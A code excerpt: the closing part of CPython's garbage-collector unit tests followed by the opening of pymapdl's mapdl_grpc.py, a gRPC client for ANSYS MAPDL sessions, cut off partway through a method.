self.assertEqual(Lazarus.resurrected, 1)
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
gc.enable()
def test_resurrection_is_transitive(self):
class Cargo:
def __init__(self):
self.me = self
class Lazarus:
resurrected_instances = []
def __del__(self):
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
laz = Lazarus()
cargo = Cargo()
cargo_id = id(cargo)
# Create a cycle between cargo and laz
laz.cargo = cargo
cargo.laz = laz
# Drop the references, force a collection and check that
# everything was resurrected.
del laz, cargo
gc.collect()
self.assertEqual(len(Lazarus.resurrected_instances), 1)
instance = Lazarus.resurrected_instances.pop()
self.assertTrue(hasattr(instance, "cargo"))
self.assertEqual(id(instance.cargo), cargo_id)
gc.collect()
gc.enable()
def test_resurrection_does_not_block_cleanup_of_other_objects(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 0)
self.assertEqual(c - oldc, 0)
self.assertEqual(nc - oldnc, 0)
# Z() should not prevent anything else from being collected.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# The A() trash should have been reclaimed already but the
# 2 copies of Z are still in zs (and the associated dicts).
oldc, oldnc = c, nc
zs.clear()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 4)
self.assertEqual(c - oldc, 4)
self.assertEqual(nc - oldnc, 0)
gc.enable()
@unittest.skipIf(ContainerNoGC is None,
'requires ContainerNoGC extension type')
def test_trash_weakref_clear(self):
# Test that trash weakrefs are properly cleared (bpo-38006).
#
# Structure we are creating:
#
# Z <- Y <- A--+--> WZ -> C
# ^ |
# +--+
# where:
# WZ is a weakref to Z with callback C
# Y doesn't implement tp_traverse
# A contains a reference to itself, Y and WZ
#
# A, Y, Z, WZ are all trash. The GC doesn't know that Z is trash
# because Y does not implement tp_traverse. To show the bug, WZ needs
# to live long enough so that Z is deallocated before it. Then, if
# gcmodule is buggy, when Z is being deallocated, C will run.
#
# To ensure WZ lives long enough, we put it in a second reference
# cycle. That trick only works due to the ordering of the GC prev/next
# linked lists. So, this test is a bit fragile.
#
# The bug reported in bpo-38006 is caused because the GC did not
# clear WZ before starting the process of calling tp_clear on the
# trash. Normally, handle_weakrefs() would find the weakref via Z and
# clear it. However, since the GC cannot find Z, WR is not cleared and
# it can execute during delete_garbage(). That can lead to disaster
# since the callback might tinker with objects that have already had
# tp_clear called on them (leaving them in possibly invalid states).
callback = unittest.mock.Mock()
class A:
__slots__ = ['a', 'y', 'wz']
class Z:
pass
# setup required object graph, as described above
a = A()
a.a = a
a.y = ContainerNoGC(Z())
a.wz = weakref.ref(a.y.value, callback)
# create second cycle to keep WZ alive longer
wr_cycle = [a.wz]
wr_cycle.append(wr_cycle)
# ensure trash unrelated to this test is gone
gc.collect()
gc.disable()
# release references and create trash
del a, wr_cycle
gc.collect()
# if called, it means there is a bug in the GC. The weakref should be
# cleared before Z dies.
callback.assert_not_called()
gc.enable()
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
class PythonFinalizationTests(unittest.TestCase):
def test_ast_fini(self):
# bpo-44184: Regression test for subtype_dealloc() when deallocating
# an AST instance also destroys its AST type: subtype_dealloc() must
# not access the type memory after deallocating the instance, since
# the type memory can be freed as well. The test is also related to
# _PyAST_Fini() which clears references to AST types.
code = textwrap.dedent("""
import ast
import codecs
# Small AST tree to keep their AST types alive
tree = ast.parse("def f(x, y): return 2*x-y")
x = [tree]
x.append(x)
# Put the cycle somewhere to survive until the last GC collection.
# Codec search functions are only cleared at the end of
# interpreter_clear().
def search_func(encoding):
return None
search_func.a = x
codecs.register(search_func)
""")
assert_python_ok("-c", code)
def setUpModule():
global enabled, debug
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
gc.collect() # Delete 2nd generation garbage
def tearDownModule():
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
unittest.main()
|
mapdl_grpc.py
|
"""gRPC specific class and methods for the MAPDL gRPC client """
import fnmatch
from functools import wraps
import glob
import io
import os
import re
import shutil
import subprocess
import tempfile
import threading
import time
from warnings import warn
import weakref
import grpc
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
import numpy as np
from tqdm import tqdm
MSG_IMPORT = """There was a problem importing the ANSYS MAPDL API module `ansys-api-mapdl`.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl' or 'pip install --upgrade ansys-api-mapdl'
If this does not solve it, please reinstall 'ansys.mapdl.core'
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
MSG_MODULE = """ANSYS API module `ansys.api.mapdl` could not be found.
This might be due to a faulty installation or obsolete API module version.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl' or 'pip install --upgrade ansys-api-mapdl'
If this does not solve it, please reinstall 'ansys.mapdl.core'.
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
try:
from ansys.api.mapdl.v0 import ansys_kernel_pb2 as anskernel
from ansys.api.mapdl.v0 import mapdl_pb2 as pb_types
from ansys.api.mapdl.v0 import mapdl_pb2_grpc as mapdl_grpc
except ImportError: # pragma: no cover
raise ImportError(MSG_IMPORT)
except ModuleNotFoundError: # pragma: no cover
raise ImportError(MSG_MODULE)
from ansys.mapdl.core import _LOCAL_PORTS, __version__, check_version
from ansys.mapdl.core.common_grpc import (
ANSYS_VALUE_TYPE,
DEFAULT_CHUNKSIZE,
DEFAULT_FILE_CHUNK_SIZE,
parse_chunks,
)
from ansys.mapdl.core.errors import MapdlExitedError, MapdlRuntimeError, protect_grpc
from ansys.mapdl.core.mapdl import _MapdlCore
from ansys.mapdl.core.misc import (
check_valid_ip,
last_created,
random_string,
run_as_prep7,
supress_logging,
)
from ansys.mapdl.core.post import PostProcessing
TMP_VAR = "__tmpvar__"
VOID_REQUEST = anskernel.EmptyRequest()
# Default 256 MB message length
MAX_MESSAGE_LENGTH = int(os.environ.get("PYMAPDL_MAX_MESSAGE_LENGTH", 256 * 1024**2))
def chunk_raw(raw, save_as):
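"""Yield ``UploadFileRequest`` chunks for an in-memory bytes payload, to be saved on the server as ``save_as``."""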
with io.BytesIO(raw) as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
return
yield pb_types.UploadFileRequest(
file_name=os.path.basename(save_as),
chunk=anskernel.Chunk(payload=piece, size=length),
)
def get_file_chunks(filename, progress_bar=False):
"""Serializes a file into chunks"""
pbar = None
if progress_bar:
n_bytes = os.path.getsize(filename)
base_name = os.path.basename(filename)
pbar = tqdm(
total=n_bytes,
desc="Uploading %s" % base_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
with open(filename, "rb") as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
if pbar is not None:
pbar.close()
return
if pbar is not None:
pbar.update(length)
chunk = anskernel.Chunk(payload=piece, size=length)
yield pb_types.UploadFileRequest(
file_name=os.path.basename(filename), chunk=chunk
)
def save_chunks_to_file(
chunks, filename, progress_bar=True, file_size=None, target_name=""
):
"""Saves chunks to a local file
Returns
-------
file_size : int
File size saved in bytes. ``0`` means no file was written.
"""
pbar = None
if progress_bar:
pbar = tqdm(
total=file_size,
desc="Downloading %s" % target_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
file_size = 0
with open(filename, "wb") as f:
for chunk in chunks:
f.write(chunk.payload)
payload_size = len(chunk.payload)
file_size += payload_size
if pbar is not None:
pbar.update(payload_size)
if pbar is not None:
pbar.close()
return file_size
class RepeatingTimer(threading.Timer):
"""Run a function repeately"""
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
class MapdlGrpc(_MapdlCore):
"""This class connects to a GRPC MAPDL server and allows commands
to be passed to a persistent session.
Parameters
----------
ip : str, optional
IP address to connect to the server. Defaults to 'localhost'.
port : int, optional
Port to connect to the mapdl server. Defaults to 50052.
timeout : float
Maximum allowable time to connect to the MAPDL server.
loglevel : str, optional
Sets which messages are printed to the console. 'INFO'
prints out all ANSYS messages, 'WARNING' prints only
messages containing ANSYS warnings, and 'ERROR' prints only
error messages. Defaults to 'WARNING'.
cleanup_on_exit : bool, optional
Exit MAPDL when Python exits or when this instance is garbage
collected.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
remove_temp_files : bool, optional
Removes temporary files on exit if MAPDL is local. Default
``False``.
log_file : bool, optional
Copy the log to a file called `logs.log` located where the
Python script is executed. Default ``False``.
print_com : bool, optional
Print the command ``/COM`` arguments to the standard output.
Default ``False``.
Examples
--------
Connect to an instance of MAPDL already running on locally on the
default port 50052.
>>> from ansys.mapdl import core as pymapdl
>>> mapdl = pymapdl.Mapdl()
Connect to an instance of MAPDL running on the LAN on a default port.
>>> mapdl = pymapdl.Mapdl('192.168.1.101')
Connect to an instance of MAPDL running on the LAN on a non-default port.
>>> mapdl = pymapdl.Mapdl('192.168.1.101', port=60001)
If you wish to customize the channel, you can also connect directly
to a gRPC channel. For example, to create an insecure channel with a
maximum message length of 8 MB:
>>> import grpc
>>> channel = grpc.insecure_channel(
... '127.0.0.1:50052',
... options=[
... ("grpc.max_receive_message_length", 8*1024**2),
... ],
... )
>>> mapdl = pymapdl.Mapdl(channel=channel)
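If MAPDL was started locally with ``launch_mapdl`` (a minimal sketch; the
exact launch arguments depend on your installation), the returned object is
already an instance of this class.
>>> from ansys.mapdl.core import launch_mapdl
>>> mapdl = launch_mapdl(cleanup_on_exit=True)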
"""
# Required by the `_name` method; these must be defined before `__init__` is called
_ip = None
_port = None
def __init__(
self,
ip=None,
port=None,
timeout=15,
loglevel="WARNING",
log_file=False,
cleanup_on_exit=False,
log_apdl=None,
set_no_abort=True,
remove_temp_files=False,
print_com=False,
channel=None,
**kwargs,
):
"""Initialize connection to the mapdl server"""
self.__distributed = None
if channel is not None:
if ip is not None or port is not None:
raise ValueError(
"If `channel` is specified, neither `port` nor `ip` can be specified."
)
elif ip is None:
ip = "127.0.0.1"
# port and ip are needed to setup the log
self._port = port
self._ip = ip
super().__init__(
loglevel=loglevel,
log_apdl=log_apdl,
log_file=log_file,
print_com=print_com,
**kwargs,
)
# gRPC-request-specific locks, as these gRPC requests are not thread safe
self._vget_lock = False
self._get_lock = False
self._prioritize_thermal = False
self._locked = False # being used within MapdlPool
self._stub = None
self._cleanup = cleanup_on_exit
self._remove_tmp = remove_temp_files
self._jobname = kwargs.pop("jobname", "file")
self._path = kwargs.pop("run_location", None)
self._busy = False # used to check if running a command on the server
self._local = ip in ["127.0.0.1", "127.0.1.1", "localhost"]
if "local" in kwargs: # pragma: no cover # allow this to be overridden
self._local = kwargs["local"]
self._health_response_queue = None
self._exiting = False
self._exited = None
self._mute = False
self._db = None
if port is None:
from ansys.mapdl.core.launcher import MAPDL_DEFAULT_PORT
port = MAPDL_DEFAULT_PORT
self._state = None
self._stub = None
self._timeout = timeout
self._pids = []
if channel is None:
self._channel = self._create_channel(ip, port)
else:
self._channel = channel
# connect to the channel and validate the connection
self._multi_connect()
# double check we have access to the local path if not
# explicitly specified
if "local" not in kwargs:
self._verify_local()
# only cache process IDs if launched locally
if self._local and "exec_file" in kwargs:
self._cache_pids()
def _create_channel(self, ip, port):
"""Create an insecured grpc channel."""
check_valid_ip(ip)
# open the channel
channel_str = f"{ip}:{port}"
self._log.debug("Opening insecure channel at %s", channel_str)
return grpc.insecure_channel(
channel_str,
options=[
("grpc.max_receive_message_length", MAX_MESSAGE_LENGTH),
],
)
def _multi_connect(self, n_attempts=5, timeout=15, set_no_abort=True):
"""Try to connect over a series of attempts to the channel.
Parameters
----------
n_attempts : int, optional
Number of connection attempts.
timeout : float, optional
Total timeout.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
"""
# This prevents a single failed connection from blocking other attempts
connected = False
attempt_timeout = timeout / n_attempts
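# each attempt gets an equal slice of the total timeout; the loop below
# stops at whichever limit (attempt count or wall-clock time) is hit first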
max_time = time.time() + timeout
i = 0
while time.time() < max_time and i <= n_attempts:
self._log.debug("Connection attempt %d", i + 1)
connected = self._connect(
timeout=attempt_timeout, set_no_abort=set_no_abort
)
i += 1
if connected:
self._log.debug("Connected")
break
else:
self._log.debug(
"Reached either maximum amount of connection attempts (%d) or timeout (%f s).",
n_attempts,
timeout,
)
if not connected:
raise IOError(
f"Unable to connect to MAPDL gRPC instance at {self._channel_str}"
)
@property
def _channel_str(self):
"""Return the target string.
Generally of the form of "ip:port", like "127.0.0.1:50052".
"""
if self._channel is not None:
return self._channel._channel.target().decode()
return ""
def _verify_local(self):
"""Check if Python is local to the MAPDL instance."""
# Verify that Python has access to the MAPDL directory.
if self._local:
if self._path is None:
directory = self.directory
else:
directory = self._path
if self._jobname is None:
jobname = self.jobname
else:
jobname = self._jobname
lockfile = os.path.join(directory, jobname + ".err")
lockfile0 = os.path.join(directory, jobname + "0.err")
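# distributed MAPDL runs typically write "<jobname>0.err" instead of
# "<jobname>.err", so check for both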
if os.path.isfile(lockfile):
return
if os.path.isfile(lockfile0):
return
self._local = False
@property
def mute(self):
"""Silence the response from all MAPDL functions unless
explicitly set to ``True``.
Returns
-------
bool
Current state of the mute.
Examples
--------
>>> mapdl.mute = True
>>> mapdl.prep7()
''
Temporarily override the instance-level setting by passing
``mute=False`` to an individual command. This is useful for
methods that parse the MAPDL output, like ``k``.
>>> mapdl.k('', 1, 1, 1, mute=False)
1
"""
return self._mute
@mute.setter
def mute(self, value):
self._mute = value
def __repr__(self):
info = super().__repr__()
return info
def _connect(self, timeout=5, set_no_abort=True, enable_health_check=False):
"""Establish a gRPC channel to a remote or local MAPDL instance.
Parameters
----------
timeout : float
Time in seconds to wait until the connection has been established
"""
self._state = grpc.channel_ready_future(self._channel)
self._stub = mapdl_grpc.MapdlServiceStub(self._channel)
# verify connection
tstart = time.time()
while ((time.time() - tstart) < timeout) and not self._state._matured:
time.sleep(0.01)
if not self._state._matured: # pragma: no cover
return False
self._log.debug("Established connection to MAPDL gRPC")
# keeps mapdl session alive
self._timer = None
if not self._local:
self._initialised = threading.Event()
self._t_trigger = time.time()
self._t_delay = 30
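# number of seconds to sleep between heartbeat checks in _threaded_heartbeat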
self._timer = threading.Thread(
target=MapdlGrpc._threaded_heartbeat, args=(weakref.proxy(self),)
)
self._timer.daemon = True
self._timer.start()
# initialize mesh, post processing, and file explorer interfaces
from ansys.mapdl.core.mesh_grpc import MeshGrpc
from ansys.mapdl.core.xpl import ansXpl
self._mesh_rep = MeshGrpc(self)
self._post = PostProcessing(self)
self._xpl = ansXpl(self)
# enable health check
if enable_health_check:
self._enable_health_check()
self.__server_version = None
# HOUSEKEEPING:
# Set to not abort after encountering errors. Otherwise, many
# failures in a row will cause MAPDL to exit without returning
# anything useful. Also avoids abort in batch mode if set.
if set_no_abort:
self._set_no_abort()
return True
@property
def _server_version(self):
"""Return the server version.
Examples
--------
>>> mapdl._server_version
(0, 3, 0)
Uses cached ``__server_version`` to avoid unnecessary communication.
"""
# check cache
if self.__server_version is None:
self.__server_version = self._get_server_version()
return self.__server_version
def _get_server_version(self):
"""Request version from gRPC server.
Generally tied to the release version unless on a development release.
2020R2 --> 0.0.0 (or any unknown version)
2021R1 --> 0.3.0
2021R2 --> 0.4.0
2022R1 --> 0.X.X
"""
sver = (0, 0, 0)
verstr = self._ctrl("VERSION")
if verstr:
sver = check_version.version_tuple(verstr)
return sver
def _enable_health_check(self):
"""Places the status of the health check in _health_response_queue"""
# lazy imports here to speed up module load
from grpc_health.v1 import health_pb2, health_pb2_grpc
def _consume_responses(response_iterator, response_queue):
try:
for response in response_iterator:
response_queue.put(response)
# NOTE: we're doing absolutely nothing with this at
# this point since the server-side health check
# doesn't change state.
except Exception as err:
if self._exiting:
return
self._exited = True
raise MapdlExitedError("Lost connection with MAPDL server") from None
# enable health check
from queue import Queue
request = health_pb2.HealthCheckRequest()
self._health_stub = health_pb2_grpc.HealthStub(self._channel)
rendezvous = self._health_stub.Watch(request)
# health check feature implemented after 2020R2
try:
status = rendezvous.next()
except Exception as err:
if err.code().name != "UNIMPLEMENTED":
raise err
return
if status.status != health_pb2.HealthCheckResponse.SERVING:
raise MapdlRuntimeError(
"Unable to enable health check and/or connect to" " the MAPDL server"
)
self._health_response_queue = Queue()
# allow main process to exit by setting daemon to true
thread = threading.Thread(
target=_consume_responses,
args=(rendezvous, self._health_response_queue),
daemon=True,
)
thread.start()
def _launch(self, start_parm, timeout=10):
"""Launch a local session of MAPDL in gRPC mode.
This should only need to be used for legacy ``open_gui``
"""
if not self._local:
raise RuntimeError(
"Can only launch the GUI with a local instance of " "MAPDL"
)
from ansys.mapdl.core.launcher import launch_grpc
self._exited = False # reset exit state
port, directory = launch_grpc(**start_parm)
self._connect(port)
# may need to wait for viable connection in open_gui case
tmax = time.time() + timeout
success = False
while time.time() < tmax:
try:
self.prep7()
success = True
break
except:
pass
if not success:
raise RuntimeError("Unable to reconnect to MAPDL")
@property
def post_processing(self):
"""Post-process in an active MAPDL session.
Examples
--------
Get the nodal displacement in the X direction for the first
result set.
>>> mapdl.set(1, 1)
>>> disp_x = mapdl.post_processing.nodal_displacement('X')
array([1.07512979e-04, 8.59137773e-05, 5.70690047e-05, ...,
5.70333124e-05, 8.58600402e-05, 1.07445726e-04])
"""
return self._post
@supress_logging
def _set_no_abort(self):
"""Do not abort MAPDL"""
self.nerr(abort=-1, mute=True)
def _reset_cache(self):
"""Reset cached items"""
self._mesh_rep._reset_cache()
self._geometry._reset_cache()
@property
def _mesh(self):
return self._mesh_rep
def _run(self, cmd, verbose=False, mute=None):
"""Sens a command and return the response as a string.
Parameters
----------
cmd : str
Valid MAPDL command.
verbose : bool, optional
Print the response of a command while it is being run.
mute : bool, optional
Request that no output be sent from the gRPC server.
Defaults to the global setting as specified with
``mapdl.mute = <bool>``. Default ``False``
Examples
--------
Run a basic command.
>>> mapdl.run('/PREP7')
Run a command and suppress its output.
>>> mapdl.run('/PREP7', mute=True)
Run a command and stream its output while it is being run.
>>> mapdl.run('/PREP7', verbose=True)
"""
if mute is None:
mute = self._mute
if self._exited:
raise MapdlExitedError
# don't allow empty commands
if not cmd.strip():
raise ValueError("Empty commands not allowed")
if len(cmd) > 639: # CMD_MAX_LENGTH
raise ValueError("Maximum command length must be less than 640 characters")
self._busy = True
if verbose:
response = self._send_command_stream(cmd, True)
else:
response = self._send_command(cmd, mute=mute)
self._busy = False
return response.strip()
@property
def busy(self):
"""True when MAPDL gRPC server is executing a command"""
return self._busy
@protect_grpc
def _send_command(self, cmd, mute=False):
"""Send a MAPDL command and return the response as a string"""
opt = ""
if mute:
opt = "MUTE" # suppress any output
request = pb_types.CmdRequest(command=cmd, opt=opt)
# TODO: Capture keyboard exception and place this in a thread
grpc_response = self._stub.SendCommand(request)
resp = grpc_response.response
if resp is not None:
return resp.strip()
return None
@protect_grpc
def _send_command_stream(self, cmd, verbose=False):
"""Send a command and expect a streaming response"""
request = pb_types.CmdRequest(command=cmd)
metadata = [("time_step_stream", "100")]
stream = self._stub.SendCommandS(request, metadata=metadata)
response = []
for item in stream:
cmdout = "\n".join(item.cmdout)
if verbose:
print(cmdout)
response.append(cmdout.strip())
return "".join(response)
def _threaded_heartbeat(self):
"""To be called from a thread to verify mapdl instance is alive"""
self._initialised.set()
while True:
if self._exited:
break
try:
time.sleep(self._t_delay)
if not self.is_alive:
break
except ReferenceError:
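# the weakref proxy to the Mapdl instance is gone; stop the heartbeat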
break
except Exception:
continue
def exit(self, save=False, force=False): # pragma: no cover
"""Exit MAPDL.
Parameters
----------
save : bool, optional
Save the database on exit. Default ``False``.
force : bool, optional
Override any environment variables that may inhibit exiting MAPDL.
Notes
-----
If ``PYMAPDL_START_INSTANCE`` is set to ``False`` (generally set in
remote testing or documentation build), then this will be
ignored. Override this behavior with ``force=True`` to always force
exiting MAPDL regardless of your local environment.
Examples
--------
>>> mapdl.exit()
"""
# check if permitted to start (and hence exit) instances
if not force:
# lazy import here to avoid circular import
from ansys.mapdl.core.launcher import get_start_instance
# ignore this method if PYMAPDL_START_INSTANCE=False
if not get_start_instance():
self._log.info("Ignoring exit due to PYMAPDL_START_INSTANCE=False")
return
if self._exited:
return
self._exiting = True
self._log.debug("Exiting MAPDL")
if save:
try:
self.save()
except:
pass
self._kill() # sets self._exited = True
self._close_process()
self._remove_lock_file()
if self._remove_tmp and self._local:
self._log.debug("Removing local temporary files")
shutil.rmtree(self.directory, ignore_errors=True)
if self._local and self._port in _LOCAL_PORTS:
_LOCAL_PORTS.remove(self._port)
def _kill(self):
"""Call exit(0) on the server."""
self._ctrl("EXIT")
self._exited = True
def _close_process(self):
"""Close all MAPDL processes"""
if self._local:
for pid in self._pids:
try:
os.kill(pid, 9)
except OSError:
pass
def _cache_pids(self):
